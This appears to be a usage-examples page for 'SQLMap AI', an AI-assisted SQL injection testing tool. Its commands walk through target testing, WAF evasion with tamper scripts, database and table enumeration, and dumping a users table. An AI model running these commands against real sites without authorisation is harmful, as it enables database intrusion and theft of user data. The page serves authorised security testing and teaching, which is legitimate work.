Basic Examples¶

This page contains practical examples of using SQLMap AI for SQL injection testing. These examples range from simple to advanced scenarios.

Example 1: Basic URL Testing¶

Simple GET Parameter Test¶

Test a basic URL with GET parameters:

# Test a vulnerable website
sqlmap-ai -u "http://testphp.vulnweb.com/listproducts.php?cat=1"

Expected Output:

🚀 SQLMap AI - AI-Powered SQL Injection Testing
================================================

📋 Target Information:
   URL: http://testphp.vulnweb.com/listproducts.php?cat=1
   Method: GET
   Parameter: cat

🤖 AI Provider: Groq (Auto-selected)

🔄 Starting Enhanced Mode...
   ├─ Initial Assessment: Checking for SQL injection vulnerabilities
   ├─ DBMS Identification: Detecting database type
   ├─ Enhanced Testing: Applying advanced techniques
   └─ AI Analysis: Generating insights and recommendations

✅ Results:
   ├─ Vulnerable Parameters: cat (GET)
   ├─ DBMS: MySQL >= 5.6
   ├─ Techniques: Boolean-based blind, time-based blind
   └─ Risk Level: HIGH

Multiple Parameter Testing¶

Test URLs with multiple parameters:

# Test all parameters
sqlmap-ai -u "http://example.com/search.php?query=test&category=1&sort=name"

# Test specific parameters only
sqlmap-ai -u "http://example.com/search.php?query=test&category=1" --param-exclude=sort

Example 2: Request File Testing¶

POST Request Testing¶

Test using a captured HTTP request:

# Test with request file
sqlmap-ai -r login_request.txt

Request File Content (login_request.txt):

POST /login.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

username=admin&password=test

JSON Request Testing¶

Test POST requests with JSON data:

# Test JSON API endpoint
sqlmap-ai -r api_request.txt

Request File Content (api_request.txt):

POST /api/search HTTP/1.1
Host: api.example.com
Content-Type: application/json
Content-Length: 45

{"query": "test", "limit": 10, "offset": 0}

Example 3: AI Provider Selection¶

Using Specific AI Provider¶

# Use Groq (fastest)
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider groq

# Use OpenAI
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider openai

# Use Anthropic (Claude)
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider anthropic

# Use Ollama (local)
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider ollama

Ollama with Specific Model¶

# Use specific Ollama model
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --ai-provider ollama \
  --ollama-model codellama

Example 4: Testing Modes¶

Enhanced Mode (Default)¶

# Full AI-powered testing
sqlmap-ai --enhanced -u "http://example.com/page.php?id=1"

# With request file
sqlmap-ai --enhanced -r request.txt

Simple Mode¶

# Basic SQLMap without AI
sqlmap-ai --simple -u "http://example.com/page.php?id=1"

# Quick batch mode
sqlmap-ai --simple -r request.txt --batch

Adaptive Mode¶

# Intelligent step-by-step testing
sqlmap-ai --adaptive -u "http://example.com/page.php?id=1"

# With specific AI provider
sqlmap-ai --adaptive -r request.txt --ai-provider groq

Example 5: Advanced Testing Options¶

Custom Risk and Level¶

# High-risk, high-level testing
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --risk 3 \
  --level 5 \
  --threads 10

Timeout and Performance¶

# Set custom timeout and threads
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --timeout 60 \
  --threads 8 \
  --max-retries 3

Output and Reporting¶

# Save results to specific directory
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --output-dir ./my_results \
  --html-report \
  --verbose

Example 6: Authentication Testing¶

Session-Based Authentication¶

# Test with session cookie
sqlmap-ai -u "http://example.com/admin.php" \
  --cookie="session=abc123; user=admin"

Header-Based Authentication¶

# Test with authorization header
sqlmap-ai -r request.txt \
  --headers="Authorization: Bearer token123"

Form-Based Authentication¶

# Test login form
sqlmap-ai -r login_request.txt \
  --forms \
  --batch

Example 7: WAF Evasion¶

Basic WAF Evasion¶

# Enable WAF evasion techniques
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --tamper=space2comment,randomcase

Advanced WAF Evasion¶

# Multiple tamper scripts
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --tamper=space2comment,randomcase,space2plus \
  --random-agent \
  --hpp

Example 8: Data Extraction¶

Database Enumeration¶

# List databases
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --dbs \
  --batch

# List tables
sqlmap-ai -u "http://example.com/page.php?id=1" \
  -D acuart \
  --tables \
  --batch

# List columns
sqlmap-ai -u "http://example.com/page.php?id=1" \
  -D acuart \
  -T users \
  --columns \
  --batch

Data Dumping¶

# Dump specific table
sqlmap-ai -u "http://example.com/page.php?id=1" \
  -D acuart \
  -T users \
  --dump \
  --batch

# Dump with conditions
sqlmap-ai -u "http://example.com/page.php?id=1" \
  -D acuart \
  -T users \
  --where="id=1" \
  --dump

Example 9: Batch Testing¶

Multiple URLs¶

# Test multiple URLs
sqlmap-ai -m urls.txt --batch

# URLs file content (urls.txt):
# http://example.com/page1.php?id=1
# http://example.com/page2.php?id=1
# http://example.com/page3.php?id=1

Multiple Request Files¶

# Test multiple request files
for file in requests/*.txt; do
  sqlmap-ai -r "$file" --batch --output-dir "./results/$(basename $file .txt)"
done

Example 10: Integration Examples¶

With Burp Suite¶

Capture request in Burp Suite
Save as .txt file

Test with SQLMap AI:

sqlmap-ai -r burp_request.txt --enhanced

With OWASP ZAP¶

Export request from ZAP

Test with SQLMap AI:

sqlmap-ai -r zap_request.txt --adaptive

With Browser Developer Tools¶

Open Developer Tools (F12)
Go to Network tab
Copy request as cURL
Convert to HTTP format
Test with SQLMap AI:
```
sqlmap-ai -r browser_request.txt
```

Example 11: Error Handling¶

Graceful Error Handling¶

# Continue on errors
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --force \
  --batch \
  --max-retries 5

Verbose Output for Debugging¶

# Get detailed output
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --verbose \
  --debug \
  --output-dir ./debug_results

Example 12: Real-World Scenarios¶

E-commerce Site Testing¶

# Test product search
sqlmap-ai -r product_search.txt \
  --enhanced \
  --ai-provider groq \
  --output-dir ./ecommerce_results

Admin Panel Testing¶

# Test admin login
sqlmap-ai -r admin_login.txt \
  --adaptive \
  --ai-provider ollama \
  --batch

API Testing¶

# Test REST API
sqlmap-ai -r api_endpoint.txt \
  --enhanced \
  --ai-provider openai \
  --headers="Content-Type: application/json"

Best Practices¶

1. Start Simple¶

# Always start with simple mode
sqlmap-ai --simple -u "http://example.com/page.php?id=1"

# Then try enhanced mode
sqlmap-ai --enhanced -u "http://example.com/page.php?id=1"

2. Use Request Files¶

# Capture real requests for accurate testing
sqlmap-ai -r captured_request.txt

3. Save Results¶

# Always save your results
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --output-dir ./results \
  --html-report

4. Monitor Resources¶

# Use reasonable thread limits
sqlmap-ai -u "http://example.com/page.php?id=1" \
  --threads 5 \
  --timeout 30

Next Steps¶

After trying these examples:

Advanced Examples: Explore more complex scenarios
Real-world Scenarios: See practical use cases
Testing Modes: Learn about different testing approaches
Request Files: Master request file testing